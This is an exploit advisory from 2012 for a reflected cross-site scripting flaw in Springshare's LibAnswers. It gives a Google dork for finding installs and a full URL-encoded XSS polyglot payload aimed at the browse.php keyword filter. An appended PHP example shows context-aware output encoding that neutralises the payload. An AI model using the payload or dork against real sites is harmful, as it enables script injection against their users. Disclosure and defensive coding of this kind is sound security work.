The LibAnswers Springshare Library suffers from a cross-site scripting vulnerability.
# Exploit Title: LibAnswers Springshare Library Cross Site Scripting
# Date: 6.02.2012
# Author: Sony
# Software Link: http://www.springshare.com/libanswers/
# Google Dorks: browse.php?tid= intext:Powered by Springshare
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/libanswers-springshare-library-cross.html
..................................................................
Well, we have XSS in Filter by Keyword:
Our XSS code:
http://codepad.org/LqL68vIQ
Demo:
http://demo.libanswers.com/browse.php?tid=0&f=[our xss is here]
http://demo.libanswers.com/browse.php?tid=0&f=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
http://1.bp.blogspot.com/-i-ou8k7YbpY/Ty__2hD11NI/AAAAAAAAAaw/DWcCzOLPwi4/s1600/libanswers.JPG
..................................................................
InSecurity.Ro
Because we care, we're security aware!
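
The demo URL above does not show which page context reflects the f parameter, so this added example (not part of the original advisory and not Springshare's code) encodes the keyword for both an HTML context and an inline-script context, in PHP because the endpoint is browse.php. The function names and the two output templates are assumptions.

```php
<?php
// Added example: context-aware output encoding for a reflected keyword.
// Not LibAnswers code; function names and templates are hypothetical.

// For HTML element content or a quoted attribute value.
function encode_for_html(string $value): string
{
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Returns a complete JavaScript string literal for an inline <script>.
function encode_for_js(string $value): string
{
    // JSON_HEX_* emits < > & ' " as \uXXXX escapes, so the value cannot close
    // the string, the <script> element or an HTML comment.
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR);
}

// True when no raw <, >, ' or " is left in the text.
function has_no_breakout(string $text): bool
{
    return strpbrk($text, "<>'\"") === false;
}

// Shortened f= value from the demo URL above (repeated middle parts dropped).
$raw = '%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E';
$keyword = rawurldecode($raw);

$html = encode_for_html($keyword);
$js   = encode_for_js($keyword);

// Compare the decoded input with both encoded forms. The JS literal is
// delimited by the two double quotes json_encode adds, so only the text
// between them is checked.
var_dump(has_no_breakout($keyword));
var_dump(has_no_breakout($html));
var_dump(has_no_breakout(substr($js, 1, -1)));

// The keyword as it would be written into each context.
echo '<input name="f" value="' . $html . '">', PHP_EOL;
echo '<script>var keyword = ' . $js . ';</script>', PHP_EOL;
```

The two encoders are not interchangeable: HTML entity encoding does not protect a value written inside a script block, and the JSON form is only meant for the script context.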